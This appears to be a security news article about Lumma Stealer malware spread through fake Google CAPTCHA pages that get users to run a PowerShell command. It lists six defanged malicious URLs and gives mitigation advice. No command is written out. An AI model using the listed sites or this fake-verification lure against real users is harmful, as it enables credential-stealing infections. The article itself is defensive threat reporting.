Lumma Stealer was first detected by Unit42 at Palo Alto Networks, but recent findings by CloudSEK indicate a wider distribution network than initially thought. The attackers have created a series of fraudulent websites, featuring a fake human verification system that mimics Google's CAPTCHA system. However, unlike genuine CAPTCHA pages that require simple actions like checking a box, these fake pages prompt users to run unusual commands.How Lumma Stealer is Spread
In one reported case, the verification page directed users to execute a PowerShell script. This script contained commands that fetched content from a remote server, downloading a file that ultimately infected the Windows system with Lumma Stealer.
Researchers have identified several URLs actively distributing Lumma Stealer. Some of these malicious websites include:Identified Malicious URLs
- hxxps[://]heroic-genie-2b372e[.]netlify[.]app/please-verify-z[.]html
- hxxps[://]fipydslaongos[.]b-cdn[.]net/please-verify-z[.]html
- hxxps[://]sdkjhfdskjnck[.]s3[.]amazonaws[.]com/human-verify-system[.]html
- hxxps[://]verifyhuman476[.]b-cdn[.]net/human-verify-system[.]html
- hxxps[://]newvideozones[.]click/veri[.]html
- hxxps[://]ch3[.]dlvideosfre[.]click/human-verify-system[.]html
Attackers are leveraging content delivery networks (CDNs) to spread these fake verification pages, utilizing base64 encoding and clipboard manipulation to evade detection. While no other malware has been reported using this method yet, the possibility of such expansion exists.Techniques Used by Attackers
As this attack relies on phishing techniques, traditional security patches won't necessarily prevent infection. However, there are several steps organizations and users can take to protect against Lumma Stealer:Mitigating the Threat of Lumma Stealer
Awareness and Training: Educate users and employees about the risks of this phishing tactic and the dangers of executing commands from unverified sources.
Endpoint Protection: Implement and maintain reliable endpoint protection solutions capable of detecting and blocking PowerShell-based attacks.
System Updates: Regularly update and patch systems to minimize vulnerabilities that Lumma Stealer could exploit.
Lumma Stealer presents a sophisticated phishing threat by tricking users into executing commands that lead to infection. With its ability to bypass traditional security measures through social engineering, it emphasizes the need for awareness and proactive defense strategies. Organizations should ensure robust endpoint protection and train users to recognize and avoid these deceptive tactics.Conclusion
